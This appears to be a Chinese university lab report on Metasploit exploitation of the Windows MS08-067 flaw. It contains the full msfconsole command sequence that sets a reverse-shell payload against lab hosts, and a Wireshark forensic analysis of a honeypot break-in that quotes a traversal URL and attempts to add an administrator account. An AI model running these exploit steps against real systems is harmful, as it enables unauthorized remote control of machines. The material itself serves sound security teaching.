20242802 2024-2025-2 《网络攻防实践》实践第六周报告

20242802 2024-2025-2 《网络攻防实践》实践第六周报告

目录

• 20242802 2024-2025-2 《网络攻防实践》实践第六周报告
  • 1.实践内容
    • 动手实践 Metasploit Windows Attacker
    • 取证分析实践
    • 团队对抗实践
  • 2.实践过程
    • （1）动手实践Metasploit windows attacker
    • （2）取证分析实践：解码一次成功的NT系统破解攻击
    • （3）团队对抗实践：windows系统远程渗透攻击和分析
      • 我方作为攻方使用metasploit对防守方的WinXP attacker靶机选择漏洞进行攻击
      • 我方作为防守方使用wireshark监听获得的网络数据包
  • 3.学习中遇到的问题及解决
  • 4.实践总结

1.实践内容

1. 动手实践 Metasploit Windows Attacker

   • 使用 Metasploit 软件对Metasploitable 靶机进行远程渗透攻击，利用 MS08-067 漏洞获取目标主机的访问权。

2. 取证分析实践

   • 分析来自特定 IP 地址的攻击者对蜜罐主机的 NT 系统破解攻击，提取并分析攻击的全部过程。

3. 团队对抗实践

   • 攻方使用 Metasploit 选择漏洞进行攻击，防守方使用 Wireshark 监听网络数据包并分析攻击过程

2.实践过程

（1）动手实践Metasploit windows attacker

虚拟机名称	IP地址
Kali-Linux	192.168.43.184
Win2kServer	192.168.43.104

确定ip再进行连通性测试

经过连通性测试后，返回kali虚拟机中安装 Metasploit

sudo apt remove metasploit-framework
sudo apt install metasploit-framework

进入到Metasploit

sudo msfconsole

在 Metasploit 控制台中，输入以下命令选择 MS08-067 漏洞利用模块并查看可用的攻击载荷

use exploit/windows/smb/ms08_067_netapi
show payloads

设置攻击载荷为反向 TCP 连接

set payload generic/shell_reverse_tcp

设置目标主机 IP（RHOST）和本地主机 IP（LHOST）并且查看配置选项

set RHOST 192.168.43.104
set LHOST 192.168.43.184
show options

攻击，进入靶机主机，成功获取靶机的 shell 后，输入以下命令查看靶机的 IP 配置

exploit
ipconfig

在靶机主机中新建文件

mkdir yyj

并从wireshark中可以查看这次操作

（2）取证分析实践：解码一次成功的NT系统破解攻击

将snort-0204@0117.log文件复制进kali虚拟机并在Kali中使用wireshark将其打开

可以发现网络流量主要在两个IP地址之间：172.16.1.106 和 213.116.251.162。这些流量包括HTTP协议的通信，其中一些请求返回了200 OK状态码，表示请求成功。还有一些TCP重置（RST）包，这通常表示连接被强制关闭。

根据筛选条件来查看HTTP流

HTTP请求中包含了对/guest/default.asp..%C0%AF./…%C0%AF…1…%C0%AF…/boot.ini HTTP/1.1的请求。通过网络搜索我得知这可能是攻击者用来掩盖其真实攻击行为的幌子，UNICODE编码漏洞攻击。

攻击者在这个流中探测了/msadc/msadcs.dll的存在，并利用了RDS漏洞（MS02-065）服务器返回了HTTP/1.1 200 OK响应，并且有一个POST请求，是攻击者用来发送恶意数据以触发SQL注入攻击的。服务器返回了HTTP/1.1 200 OK响应，表明请求成功。响应内容中包含了ADM!ROX!YOURIWORLD特征字符串，这是攻击者用来确认其攻击成功的标记。

继续跟踪其他数据包 发现有攻击者通过蜜网主机下载文件的行为

删除ftp文件

攻击者通过6969端口建立交互式控制阶段，攻击者尝试添加用户hi guy的操作，这表明攻击者正在尝试在目标系统中创建新的用户账户，以便维持对系统的控制。

攻击者在目标系统上执行的命令，包括net localgroup administrators，攻击者尝试添加用户hi guy到管理员组，但由于系统错误1312，操作失败。试图提升权限，以便获得更高的访问权限。

（3）团队对抗实践：windows系统远程渗透攻击和分析

在虚拟网络编辑器中将kali攻击机和Win2kServer靶机均设置为Vmnet0桥接模式，并且在实验过程中链接同一WIFI

配置完成后确认攻击机和靶机的IP

本实验中用到的虚拟机IP如下：

虚拟机名称	IP地址
(殷余嘉)Kali-Linux	192.168.43.184
(殷余嘉)Win2kServer_SP0_target	192.168.43.105
(鲍恒宇)Kali-Linux	192.168.43.193
(鲍恒宇)WinXP attacker	192.168.43.203

确认IP之后进行连通性测试

我方作为攻方使用metasploit对防守方的WinXP attacker靶机选择漏洞进行攻击

msfconsole

利用MS08-067漏洞进行远程渗透攻击并查看攻击负载

use exploit/windows/smb/ms08_067_netapi
show payloads

设置攻击载荷为反向 TCP 连接

set payload generic/shell_reverse_tcp

设置目标主机 IP（RHOST）和本地主机 IP（LHOST）

set RHOST 192.168.43.203
set LHOST 192.168.43.184
show options

执行攻击

exploit

攻击成功，进入对方的主机并在对方主机中创建文件夹并进入文件夹，可以在靶机中看到该文件夹

mkdir yyj！
cd yyj！

我方作为防守方使用wireshark监听获得的网络数据包

虚拟机名称	IP地址
(殷余嘉)Kali-Linux	192.168.43.9
(殷余嘉)Win2kServer	192.168.43.104
(鲍恒宇)Kali-Linux	192.168.43.193
(鲍恒宇)WinXP attacker	192.168.43.203

确定Win2kServer靶机的IP

待攻击方完成攻击后可以在Win2kServer靶机中发现对方创建的文件夹

使用wireshark分析

跟踪TCP流，可以看到攻击方入侵靶机主机后进行过创建文件夹bhy2的操作

3.学习中遇到的问题及解决

• 问题1： 无法进入msfconsole

  

• 问题1解决方案：使用root 用户权限

  sudo msfconsole
  

• 问题2：kali攻击机和Win2kServer靶机连通性测试失败

• 问题2解决方案：在虚拟网络编辑器中将kali攻击机和Win2kServer靶机均设置为Vmnet0桥接模式

4.实践总结

在这周的实验中主要是Metasploit 的漏洞利用、网络取证分析以及团队对抗展开。通过 Metasploit 的实践，我掌握了如何利用漏洞获取目标主机的访问权，并通过 Wireshark 分析攻击过程。在取证分析中，从攻击日志中提取关键信息。团队对抗实践是本次实验中我最感兴趣的部分。是学习网络攻防实践课程以来第一次在不同的主机上模拟攻防双方，我和鲍恒宇同学协作分别进行了攻击和防御实验。 作为攻击方，我使用Metasploit对防守方的靶机进行了攻击，成功获取了控制权。而作为防守方，我通过Wireshark监听和分析了网络数据包，尝试追踪攻击者的行动。